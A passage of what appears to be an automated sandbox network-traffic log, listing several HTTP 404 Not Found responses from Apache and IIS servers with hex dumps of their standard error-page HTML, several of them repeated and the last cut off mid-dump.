                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: b53733d3-2b94-402b-9bb6-db13dc2026c7Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:28 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 